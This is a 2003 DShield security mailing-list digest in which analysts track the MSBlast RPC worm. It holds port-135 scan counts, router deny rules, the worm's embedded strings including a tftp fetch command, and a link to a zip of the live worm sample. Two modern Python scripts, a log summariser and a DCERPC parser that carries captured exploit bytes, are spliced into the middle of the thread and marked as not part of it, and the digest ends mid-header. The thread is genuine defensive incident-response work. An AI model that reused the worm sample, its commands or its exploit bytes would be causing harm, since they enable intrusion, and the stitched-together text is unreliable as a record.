[Dshield] Re: list Digest, Vol 8, Issue 16

Luke LeCrosse luke646 at yahoo.com
Tue Aug 12 01:11:43 GMT 2003


A friend of mine just got hit with this one, "exploitcontrolrpc", and can neither delete nor quarantine it. Has anyone else seen it before, and does anyone have a solution?
 
Thanks,
 
Luke

list-request at dshield.org wrote:
Send list mailing list submissions to
list at dshield.org

To subscribe or unsubscribe via the World Wide Web, visit
http://www.dshield.org/mailman/listinfo/list
or, via email, send a message with subject or body 'help' to
list-request at dshield.org

You can reach the person managing the list at
list-owner at dshield.org

When replying, please edit your Subject line so it is more specific
than "Re: Contents of list digest..."

Today's Topics:

1. Re: infocon: yellow (Johannes Ullrich)
2. RE: massive attack to rpc? (Paul Marsh)
3. RE: infocon: yellow (Synergy)
4. RE: infocon: yellow (Andy Hopkins)
5. Re: RE: [Dshield] infocon: yellow
6. Re: infocon: yellow (Jonathan Rickman)
7. Re: infocon: yellow (Jeff Kell)
8. Sorry I know we're all busy but I had to share this with the list. (Paul Marsh)
9. RE: infocon: yellow (Chris Ream)
10. Re: infocon: yellow
11. Re: Sorry I know we're all busy but I had to share this with the list. (Jonathan Rickman)
12. ISS is reporting the following (Paul Marsh)
13. Re: infocon: yellow (Blake McNeill)
14. Re: Re: [Dshield] infocon: yellow
15. Re: infocon: yellow (Jonathan Rickman)
16. Re: infocon: yellow
17. RE: infocon: yellow (Chris Ream)
18. RE: infocon: yellow (Chris Ream)
19. Re: infocon: yellow (Blake McNeill)
20. Re: infocon: yellow (Jonathan Rickman)
21. Re: Packet payloads to TCP:135, TCP:4444 (John Sage)


Date: Mon, 11 Aug 2003 15:58:53 -0400
From: Johannes Ullrich 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <1060631933.11754.250.camel at bart>
In-Reply-To: <20030811192631.46380.qmail at web20413.mail.yahoo.com>
References: <20030811192631.46380.qmail at web20413.mail.yahoo.com>
Content-Type: text/plain
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 1

http://johannes.homepc.org/viruszoo/msblast.zip
please let me know what you find.



On Mon, 2003-08-11 at 15:26, Mrcorp wrote:
> any chance of getting the worm in a zip file for further analysis?
> 
> Thank you,
> 
> Charles
> 
> --- "Johannes B. Ullrich" wrote:
> > We just got a binary that looks very much like an
> > RPC worm. It scans for port 135. No real idea what it does (other than
> > scanning).
> > 
> > Strings from the file:
> > 
> > msblast.exe
> > I just want to say LOVE YOU SAN!!
> > billy gates why do you make this possible ? 
> > Stop making money and fix your software
> > windowsupdate.com
> > 
> > BILLY
> > windows auto update
> > SOFTWARE\Microsoft\Windows\CurrentVersion\Run
> > tftp -i %s GET %s
> > 
> > 
> > 
> > 
> > -- 
> > SANS - Internet Storm Center
> > http://isc.sans.org
> > PGP Key: http://isc.sans.org/jullrich.txt
> > 
> > _______________________________________________
> > list mailing list
> > list at dshield.org
> > To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
> 
> 
-- 
--------------------------------------------------------------
Johannes Ullrich jullrich at euclidian.com
pgp key: http://johannes.homepc.org/PGPKEYS
--------------------------------------------------------------
"We regret to inform you that we do not enable any of the 
security functions within the routers that we install."
support at covad.net
--------------------------------------------------------------




Date: Mon, 11 Aug 2003 16:00:40 -0400
From: "Paul Marsh" 

To: "General DShield Discussion List" 

Subject: RE: [Dshield] massive attack to rpc?
Message-ID: <9F3B43C638622B45B013654517B61D9B064AC2 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 2

Shawn:

Just an FYI on the info you just posted to Isaac's question. This thing can hide; I think you're better off fdisk'ing and reinstalling. http://isc.sans.org/diary.html?date=2003-08-09

-----Original Message-----
From: Shawn Cox [mailto:shawn.cox at pcca.com]
Sent: Monday, August 11, 2003 3:51 PM
To: General DShield Discussion List
Subject: Re: [Dshield] massive attack to rpc?


Yes. The connection attempt causes the RPC service to crash. In XP the
service is set to reboot the computer 60 seconds later. Remove your affected
machine from the network, patch, and re-attach to the network.


----- Original Message ----- 
From: "isaac perez" 

To: 

Sent: Monday, August 11, 2003 2:40 PM
Subject: [Dshield] massive attack to rpc?


> Hi,
> I'm new on this list. Does anyone know what happens with a problem of RPC that
> makes the system shut down?
> It seems a massive attack like the old Code Red, but it isn't directed at one
> host; it's directed at a large number of hosts and done by different IPs.
> My location is in Spain, but I think the "attacker" IPs come from different
> countries, so I suppose it happens the same in "all" the world.
> Thanks, I have reported my logs to DShield.
> And waiting for the notices.....
>
> Sorry for my expressions; English isn't my first language.
>




Date: Mon, 11 Aug 2003 16:02:22 -0400
From: Synergy 
To: General DShield Discussion List 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <5.1.0.14.2.20030811155849.022c6bc8 at pop1.attglobal.net>
In-Reply-To: <460D28F67915D51184E600508BD8A9E3030E0403 at aeteaexch1.aetea.com>
Content-Type: text/plain; charset="us-ascii"; format=flowed
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 3

At 03:04 PM 8/11/2003, Richard Golodner wrote:
>We are seeing a 10x increase in scans for port 135 beginning at 1400 Eastern
>Time.
>Top Four Netblocks
>61.43.222.214
>65.30.70.92
>198.142.176.27
>212.27.213.168

If it's any help -- I've got loggers running on Linksys routers in three 
locations: Comcast in Seattle, Comcast in Kittery Maine, and Cox in 
Providence RI. In each case the great bulk of the 135 scans are from 
machines that are quite nearby in terms of IP addresses, e.g. N.N.N.x or 
N.N.x.x

rgds


--
Synergy - 96 Bolton Ave Suite 2, Providence RI 
02908 USA
401 274-5827, cell: 401 225-5004, fax: 401 274-4944



Date: Tue, 12 Aug 2003 08:27:55 +1200
From: Andy Hopkins 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 4

FYI: It's started here in NZ at 02:30 local time

------------------------------------------
Andy Hopkins
Senior Unix & Firewall Administrator
healthAlliance

(+64) (9) 486 8944
(+64) (25) 285 2139

Disclaimer:
The views and information expressed in this e-Mail are actually mine,
because my partner says so!
healthAlliance doesn't necessarily agree with me either



-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Tuesday, 12 August 2003 06:24
To: list at dshield.org
Subject: [Dshield] infocon: yellow




Date: Mon, 11 Aug 2003 15:41 -0500
From: haled at longlines.com
To: General DShield Discussion List 

CC: 
Subject: Re: RE: [Dshield] infocon: yellow
Message-ID: <200308112041.h7BKfRN2015588 at elwood.pionet.net>
Content-Type: text/plain
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 5

Iowa is getting hammered right now. I have talked to a couple of the offending ISPs and they said that they are getting calls from customers who say that the customer is getting an error that says that they have to reboot.

Deb 


>FYI: It's started here in NZ at 02:30 local time
>





Date: Mon, 11 Aug 2003 16:47:00 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <200308111647.00023.jonathan at xcorps.net>
In-Reply-To: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
References: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 6

On Monday 11 August 2003 16:27, Andy Hopkins wrote:
> FYI: It's started here in NZ at 02:30 local time

Got a flurry of them here at 15:43 EST but it promptly ceased at 16:20 EST. 
Waiting for confirmation that it has been blocked upstream. 

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net




Date: Mon, 11 Aug 2003 16:49:54 -0400
From: Jeff Kell 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <3F380172.6050807 at utc.edu>
In-Reply-To: <200308112041.h7BKfRN2015588 at elwood.pionet.net>
References: <200308112041.h7BKfRN2015588 at elwood.pionet.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 7

haled at longlines.com wrote:

> Iowa is getting hammered right now. I have talked to a couple of the
> offending ISP's and they said that they are getting calls from
> customers who say that the customer is getting an error that says
> that they have to reboot.


On one of our ISPs:
deny tcp any any range 135 139 (223189 matches)
deny udp any any range 135 netbios-ss (105897 matches)
deny udp any any eq 445
deny tcp any any eq 445 (74579 matches)

On another:
deny tcp any any range 135 139 (147934 matches)
deny udp any any range 135 netbios-ss (103334 matches)
deny udp any any eq 445
deny tcp any any eq 445 (56901 matches)

This data is a little over 14 hours accumulated time.

Jeff



Date: Mon, 11 Aug 2003 16:50:10 -0400
From: "Paul Marsh" 

To: "'Dshield (E-mail)" 

Subject: [Dshield] Sorry I know we're all busy but I had to share this with the list.
Message-ID: <9F3B43C638622B45B013654517B61D9B064AC4 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 8

The following are just a few posts I just received on FD, it's amazing, isn't anyone paying attention?

#1.

We're seeing what looks like an rpc worm spreading internally (gotta love
dialup users), and I'm trying to figure out if this is something new, or
just something old that we finally are getting.

I'm not entirely sure it's a worm, it almost appears to be an auto-rooter
with quick spreading ability (fine line between that and a worm, I
suppose). Has anybody else seen something with these characteristics:

Host scans local subnet first, looking for vulnerable machines and opening
up port 4444 on the remote host, and running the following:

#2.

I'm working as a technician and have had 3 people
from the local area call within the last hour about a
problem with having their computer shut down after
giving a one minute warning. This only happens when
they have an internet connection - if they boot up
with a network cable plugged in, even if they don't
have a browser or any other apps open, it'll shut
down. It looks like they're all running NT/2k/XP as
well - is this a DCOM worm? 

#3.

I had two friends of mine call me, telling that
their PC would "constantly reboot" complaining
about some "RPC" thing. Both calls within an
hour. Something tells me it might have to do
with that worm...



Date: Mon, 11 Aug 2003 15:01:05 -0600
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
In-Reply-To: <02849FD6E5920D4F87DFC9697D4690CEC8FCB0 at nshexg002.whl.co.nz>
Content-Type: text/plain;
charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 9

Has anyone captured the packet stream? I've got some sensors listening
but have not yet seen it. I would like to reconstruct it and disassemble
it to find out exactly what it's doing.

If anyone has captured it and is willing to share it I would greatly
appreciate it.

Chris Ream
Synaptek Network Security.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Andy Hopkins
Sent: Monday, August 11, 2003 2:28 PM
To: 'General DShield Discussion List'
Subject: RE: [Dshield] infocon: yellow

FYI: It's started here in NZ at 02:30 local time




Date: Mon, 11 Aug 2003 17:01:42 -0400
From: Phil.Rodrigues at uconn.edu
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: 
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 10

This is our number of dropped TCP 135 requests since noon today, per 30 
mins:

57,003 1200 to 1230
75,317 1230
59,321 1300
52,642 1330
130,932 1400
202,996 1430
277,183 1500
247,682 1530
320,919 1600
361,504 1630 to 1700

Phil

=======================================
Philip A. Rodrigues
Network Analyst, UITS
University of Connecticut

email: phil.rodrigues at uconn.edu
phone: 860.486.3743
fax: 860.486.6580
web: http://www.security.uconn.edu
=======================================










Date: Mon, 11 Aug 2003 17:03:06 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] Sorry I know we're all busy but I had to share this
with the list.
Message-ID: <200308111703.06480.jonathan at xcorps.net>
In-Reply-To: <9F3B43C638622B45B013654517B61D9B064AC4 at banana-jr-6k.nmefdn.org>
References: <9F3B43C638622B45B013654517B61D9B064AC4 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 11

On Monday 11 August 2003 16:50, Paul Marsh wrote:
> The following are just a few posts I just received on FD, it's amazing,
> isn't anyone paying attention?

Obviously not, as I am now logging over 300 attempts per minute on one 
single host, most coming from the same class B. Interestingly enough, only 
2 repeats so far. You do the math. 

It stopped for a bit. I thought the upstream had started blocking it, but 
apparently I was wrong.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net
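Several posts above read the same three things off firewall logs by hand: TCP/135 drops per half hour (Phil's counts, Richard's 10x increase), how many sources sit in the sensor's own /24 or /16 (Synergy's N.N.N.x, Jonathan's "same class B"), and how few sources repeat (Jonathan's "only 2 repeats"). As an added example that is not from the thread, this script computes them from iptables-style DROP lines; the log format, the sensor address 10.20.30.5 and the sample lines are constructed assumptions.

```python
"""Added example, not from the thread: summarise TCP/135 drops the way the
posters did by hand.  Assumes iptables-style kernel DROP lines; the sample
log and the sensor address are constructed."""
from collections import Counter
from datetime import datetime
import ipaddress
import re

LOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) .*"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\w+) SPT=\d+ DPT=(?P<dpt>\d+)"
)

SENSOR_IP = "10.20.30.5"   # constructed; the address the firewall protects
LOG_YEAR = 2003            # syslog lines carry no year, so it is assumed

# Constructed sample log (not captured traffic). Two lines are not TCP/135
# and must be ignored by the parser.
SAMPLE_LOG = """\
Aug 11 13:05:12 fw kernel: DROP IN=eth0 SRC=10.99.1.2 DST=10.20.30.5 PROTO=TCP SPT=1063 DPT=135
Aug 11 13:20:40 fw kernel: DROP IN=eth0 SRC=172.16.4.4 DST=10.20.30.5 PROTO=TCP SPT=2201 DPT=135
Aug 11 13:45:03 fw kernel: DROP IN=eth0 SRC=10.20.30.77 DST=10.20.30.5 PROTO=TCP SPT=1040 DPT=135
Aug 11 13:50:10 fw kernel: DROP IN=eth0 SRC=10.20.30.77 DST=10.20.30.5 PROTO=TCP SPT=1041 DPT=80
Aug 11 14:01:00 fw kernel: DROP IN=eth0 SRC=10.20.30.12 DST=10.20.30.5 PROTO=TCP SPT=1107 DPT=135
Aug 11 14:02:30 fw kernel: DROP IN=eth0 SRC=10.20.31.9 DST=10.20.30.5 PROTO=TCP SPT=3020 DPT=135
Aug 11 14:05:00 fw kernel: DROP IN=eth0 SRC=10.20.30.77 DST=10.20.30.5 PROTO=TCP SPT=1044 DPT=135
Aug 11 14:10:00 fw kernel: DROP IN=eth0 SRC=10.20.31.200 DST=10.20.30.5 PROTO=TCP SPT=1500 DPT=135
Aug 11 14:25:59 fw kernel: DROP IN=eth0 SRC=10.20.30.88 DST=10.20.30.5 PROTO=TCP SPT=1099 DPT=135
Aug 11 14:27:00 fw kernel: DROP IN=eth0 SRC=10.20.30.91 DST=10.20.30.5 PROTO=TCP SPT=1210 DPT=135
Aug 11 14:29:01 fw kernel: DROP IN=eth0 SRC=10.20.30.44 DST=10.20.30.5 PROTO=UDP SPT=1234 DPT=69
"""


def parse_events(log_text, proto="TCP", dport=135, year=LOG_YEAR):
    """Return (timestamp, source) for every line that is a drop of proto/dport."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["proto"] != proto or int(m["dpt"]) != dport:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                               "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"]))
    return events


def hits_per_window(events, minutes=30):
    """Count hits per fixed window; keys are 'HH:MM' of the window start."""
    counts = Counter()
    for ts, _ in events:
        start = ts.replace(minute=(ts.minute // minutes) * minutes, second=0)
        counts[start.strftime("%H:%M")] += 1
    return dict(sorted(counts.items()))


def growth(window_counts):
    """Last window divided by the first one (0.0 when there is nothing to compare)."""
    values = list(window_counts.values())
    if len(values) < 2 or values[0] == 0:
        return 0.0
    return values[-1] / values[0]


def locality(events, sensor_ip=SENSOR_IP):
    """Bucket each hit by the narrowest prefix its source shares with the sensor."""
    sensor = ipaddress.ip_address(sensor_ip)
    buckets = {"same /24": 0, "same /16": 0, "elsewhere": 0}
    for _, src in events:
        src_ip = ipaddress.ip_address(src)
        if src_ip in ipaddress.ip_network(f"{sensor}/24", strict=False):
            buckets["same /24"] += 1
        elif src_ip in ipaddress.ip_network(f"{sensor}/16", strict=False):
            buckets["same /16"] += 1
        else:
            buckets["elsewhere"] += 1
    return buckets


def repeat_sources(events):
    """Sources seen more than once; a worm sweeping address space shows very few."""
    return {src: n for src, n in Counter(src for _, src in events).items() if n > 1}


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    windows = hits_per_window(ev)
    print("TCP/135 hits per 30 min:", windows, "growth x%.1f" % growth(windows))
    print("source locality:", locality(ev))
    print("repeat sources:", repeat_sources(ev))
```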




Date: Mon, 11 Aug 2003 17:08:46 -0400
From: "Paul Marsh" 

To: "'Dshield (E-mail)" 

Subject: [Dshield] ISS is reporting the following
Message-ID: <9F3B43C638622B45B013654517B61D9B064AC6 at banana-jr-6k.nmefdn.org>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 12

https://gtoc.iss.net/issEn/delivery/gtoc/index.jsp



Date: Mon, 11 Aug 2003 15:22:37 -0600
From: Blake McNeill 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <012501c3604e$b08270c0$07a8a8c0 at delphi>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
Content-Type: text/plain; charset=iso-8859-1
MIME-Version: 1.0
Content-Transfer-Encoding: 7BIT
Precedence: list
Reply-to: General DShield Discussion List 

Message: 13

This is a capture from last night, but now we are seeing lots of them. One
person told me that this is the xFocus/Metasploit scan, but we had not seen
it with the second part until this morning, while we had seen lots of
xFocus/Metasploit scans before ( http://www.linklogger.com/RPC_DCOM.htm ), so
I have some doubts about their analysis and perhaps this is the worm.

Blake
http://www.SonicLogger.com - Logging Software for SonicWall and 3Com
http://www.LinkLogger.com - Logging Software for Linksys, Netgear and Zyxel


TCP Connection Request
--- 8/10/03 18:38:27.580

65.33.159.235 : 1040 TCP Connected ID = 6
--- 8/10/03 18:38:27.690
Status Code: 0 OK


65.33.159.235 : 1040 TCP Disconnected ID = 6
--- 8/10/03 18:38:33.400
Status Code: 0 OK



----- Original Message ----- 
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Sent: Monday, August 11, 2003 3:01 PM
Subject: RE: [Dshield] infocon: yellow


> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and disassemble
> it to find out exactly what it's doing.
>
> If anyone has captured it and is willing to share it I would greatly
> appreciate it.
>
> Chris Ream
> Synaptek Network Security.
>
>
> -----Original Message-----
> From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
> Behalf Of Andy Hopkins
> Sent: Monday, August 11, 2003 2:28 PM
> To: 'General DShield Discussion List'
> Subject: RE: [Dshield] infocon: yellow
>
> FYI: It's started here in NZ at 02:30 local time
>
> ------------------------------------------
> Andy Hopkins
> Senior Unix & Firewall Administrator
> healthAlliance
>
> (+64) (9) 486 8944
> (+64) (25) 285 2139
>
> Disclaimer:
> The views and information expressed in this e-Mail are actually mine,
> because my partner says so!
> healthAlliance doesn't necessarily agree with me either
>
>
>
> -----Original Message-----
> From: Johannes B. Ullrich [mailto:jullrich at sans.org]
> Sent: Tuesday, 12 August 2003 06:24
> To: list at dshield.org
> Subject: [Dshield] infocon: yellow
>
>
>
> We just got a binary that looks very much like an
> RPC worm. It scans for port 135. No real idea what it does (other than
> scanning).
>
> Strings from the file:
>
> msblast.exe
> I just want to say LOVE YOU SAN!!
> billy gates why do you make this possible ?
> Stop making money and fix your software
> windowsupdate.com
>
> BILLY
> windows auto update
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
> tftp -i %s GET %s
>
>
>
>
> -- 
> SANS - Internet Storm Center
> http://isc.sans.org
> PGP Key: http://isc.sans.org/jullrich.txt
>
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list



> ATTACHMENT part 3.14 message/rfc822 
Date: Mon, 11 Aug 2003 16:39 -0500
From: haled at longlines.com
To: General DShield Discussion List 

CC: 
Subject: Re: Re: [Dshield] infocon: yellow
Message-ID: <200308112139.h7BLdrN2021202 at elwood.pionet.net>
Content-Type: text/plain
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 14

And if I could get some of the ISPs in the area to get their "head out of their hiney" long enough to smell the roses, they wouldn't be getting overwhelmed either. I am fighting a losing battle, I think! Their attitude is "Oh well, it is the customer's problem."



>haled at longlines.com wrote:
>
>> Iowa is getting hammered right now. I have talked to a couple of the
>> offending ISP's and they said that they are getting calls from
>> customers who say that the customer is getting an error that says
>> that they have to reboot.
>
>
>On one of our ISPs:
> deny tcp any any range 135 139 (223189 matches)
> deny udp any any range 135 netbios-ss (105897 matches)
> deny udp any any eq 445
> deny tcp any any eq 445 (74579 matches)
>
>On another:
> deny tcp any any range 135 139 (147934 matches)
> deny udp any any range 135 netbios-ss (103334 matches)
> deny udp any any eq 445
> deny tcp any any eq 445 (56901 matches)
>
>This data is a little over 14 hours accumulated time.
>
>Jeff
>

-------------------
Email sent using Long Lines Web Mail (http://www.longlines.com/)




> ATTACHMENT part 3.15 message/rfc822 
Date: Mon, 11 Aug 2003 17:38:12 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <200308111738.12075.jonathan at xcorps.net>
In-Reply-To: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
Content-Type: Multipart/Mixed;
boundary="Boundary-00=_EzAO/cP3rui1QTV"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 15

On Monday 11 August 2003 17:01, Chris Ream wrote:
> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and disassemble
> it to find out exactly what it's doing.
>
> If anyone has captured it and is willing to share it I would greatly
> appreciate it.

Hex dump from netcat attached.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net


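A small walker over the DCERPC framing of that netcat dump, added here as an example (it is not code from the thread or from any product named in it): it splits the stream into PDUs by each header's frag_length, decodes the bind PDU to show which interface the peer asked for, and reports the size of the request that follows. The bind PDU it runs on is the 72-byte one from the dump; the request is constructed from the real 16-byte header with a zero-filled body, and naming UUID 000001a0-0000-0000-c000-000000000046 "ISystemActivator" is this example's own lookup table, not something the dump states.

```python
"""Walk a TCP stream captured on port 135 and list the DCERPC PDUs in it.

Added example, not code from the DShield thread. Only the 16-byte DCERPC
common header of each PDU and, for a bind, the presentation-context list
are decoded: enough to see which RPC interface a peer asked for before any
request payload arrives. SAMPLE_STREAM is constructed: the bind PDU is the
72-byte one in the dump, the request keeps the real 16-byte header and is
zero-filled to its frag_length instead of carrying the captured body.
"""
import struct
import uuid

# Connection-oriented PDU types from the DCE 1.1 RPC spec (C706) / MS-RPCE.
PDU_TYPES = {0: "request", 2: "response", 3: "fault", 11: "bind",
             12: "bind_ack", 13: "bind_nak", 14: "alter_context"}

# Interfaces worth flagging when an external peer binds to them on TCP 135.
# Assumed mapping for this example: the DCOM activation interface.
WATCHED_IFACES = {
    "000001a0-0000-0000-c000-000000000046": "ISystemActivator",
}

BIND_PDU = bytes.fromhex(
    "0500 0b03 1000 0000 4800 0000 7f00 0000"   # header: v5.0, bind, len 0x48
    "d016 d016 0000 0000 0100 0000 0100 0100"   # frag sizes, one context
    "a001 0000 0000 0000 c000 0000 0000 0046"   # abstract syntax UUID
    "0000 0000 045d 888a eb1c c911 9fe8 0800"   # version 0, NDR UUID ...
    "2b10 4860 0200 0000"                       # ... NDR transfer syntax v2
)
REQUEST_HDR = bytes.fromhex("0500 0003 1000 0000 a806 0000 e500 0000")
REQUEST_LEN = 0x06A8  # frag_length from the header above (1704 bytes)
# Constructed body: zero-filled, the captured payload is not reproduced.
SAMPLE_STREAM = BIND_PDU + REQUEST_HDR + b"\x00" * (REQUEST_LEN - 16)


def _uuid(buf, pos, le):
    """UUIDs on the wire follow the PDU's integer byte order."""
    raw = bytes(buf[pos:pos + 16])
    return str(uuid.UUID(bytes_le=raw) if le else uuid.UUID(bytes=raw))


def parse_bind_contexts(buf, off, fmt, le):
    """Decode the presentation-context list of a bind PDU starting at off."""
    n_ctx = buf[off + 24]          # after max_xmit(2) max_recv(2) assoc_group(4)
    pos = off + 28                 # skip n_context_elem + 3 reserved bytes
    contexts = []
    for _ in range(n_ctx):
        cont_id, n_transfer = struct.unpack_from(fmt + "HB", buf, pos)
        pos += 4                   # cont_id(2) n_transfer_syn(1) reserved(1)
        abstract = _uuid(buf, pos, le)
        abstract_ver = struct.unpack_from(fmt + "I", buf, pos + 16)[0]
        pos += 20                  # UUID(16) + version(4)
        transfers = []
        for _ in range(n_transfer):
            transfers.append(_uuid(buf, pos, le))
            pos += 20
        contexts.append({"cont_id": cont_id, "abstract": abstract,
                         "abstract_ver": abstract_ver, "transfer": transfers})
    return contexts


def walk_stream(buf):
    """Split a byte stream into DCERPC PDUs using each header's frag_length."""
    pdus, off = [], 0
    while len(buf) - off >= 16:
        # Upper nibble of the first data-representation byte: 1 = little-endian.
        le = (buf[off + 4] & 0xF0) == 0x10
        fmt = "<" if le else ">"
        vers, minor, ptype, flags, _drep, frag_len, auth_len, call_id = \
            struct.unpack_from(fmt + "BBBB4sHHI", buf, off)
        pdu = {"offset": off, "version": f"{vers}.{minor}",
               "ptype": PDU_TYPES.get(ptype, f"unknown({ptype})"),
               "flags": flags, "frag_length": frag_len,
               "auth_length": auth_len, "call_id": call_id,
               "truncated": off + frag_len > len(buf)}
        if vers != 5 or frag_len < 16:
            pdu["ptype"] = "not-dcerpc"   # stop on anything that is not RPC
            pdus.append(pdu)
            break
        if pdu["ptype"] == "bind" and not pdu["truncated"]:
            pdu["contexts"] = parse_bind_contexts(buf, off, fmt, le)
        pdus.append(pdu)
        if pdu["truncated"]:
            break                         # capture ended mid-PDU
        off += frag_len
    return pdus


def assess(pdus):
    """Return human-readable findings for a stream seen on TCP 135."""
    findings = []
    for p in pdus:
        for ctx in p.get("contexts", []):
            name = WATCHED_IFACES.get(ctx["abstract"])
            if name:
                findings.append(f"bind call_id={p['call_id']} to {name} "
                                f"({ctx['abstract']}) v{ctx['abstract_ver']}")
        if p["ptype"] == "request":
            note = " (truncated)" if p["truncated"] else ""
            findings.append(f"request call_id={p['call_id']} "
                            f"frag_length={p['frag_length']}{note}")
    return findings


if __name__ == "__main__":
    for line in assess(walk_stream(SAMPLE_STREAM)):
        print(line)
```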

> ATTACHMENT part 3.16 message/rfc822 
Date: Mon, 11 Aug 2003 17:57:54 -0400
From: Phil.Rodrigues at uconn.edu
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: 
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 16

And here is a graph of our TCP 135 hits per 30mins. Have fun watching it 
grow!

http://aster.uits.uconn.edu/~ipaudit/images/dcom-large.png

Phil

=======================================
Philip A. Rodrigues
Network Analyst, UITS
University of Connecticut

email: phil.rodrigues at uconn.edu
phone: 860.486.3743
fax: 860.486.6580
web: http://www.security.uconn.edu
=======================================





Phil.Rodrigues at uconn.edu
Sent by: list-bounces at dshield.org
08/11/2003 05:01 PM
Please respond to General DShield Discussion List


To: General DShield Discussion List 

cc: 
Subject: Re: [Dshield] infocon: yellow


This is our number of dropped TCP 135 requests since noon today, per 30 
mins:

57,003 1200 to 1230
75,317 1230
59,321 1300
52,642 1330
130,932 1400
202,996 1430
277,183 1500
247,682 1530
320,919 1600
361,504 1630 to 1700

Phil

=======================================
Philip A. Rodrigues
Network Analyst, UITS
University of Connecticut

email: phil.rodrigues at uconn.edu
phone: 860.486.3743
fax: 860.486.6580
web: http://www.security.uconn.edu
=======================================





Jonathan Rickman 
Sent by: list-bounces at dshield.org
08/11/2003 04:47 PM
Please respond to General DShield Discussion List


To: General DShield Discussion List 

cc: 
Subject: Re: [Dshield] infocon: yellow


On Monday 11 August 2003 16:27, Andy Hopkins wrote:
> FYI: It's started here in NZ at 02:30 local time

Got a flurry of them here at 15:43 EST but it promptly ceased at 16:20 
EST. 
Waiting for confirmation that it has been blocked upstream. 

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net







> ATTACHMENT part 3.17 message/rfc822 
Date: Mon, 11 Aug 2003 16:10:00 -0600
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <001b01c36055$4eff80c0$468d11d8 at CLR>
In-Reply-To: <200308111738.12075.jonathan at xcorps.net>
Content-Type: text/plain;
charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
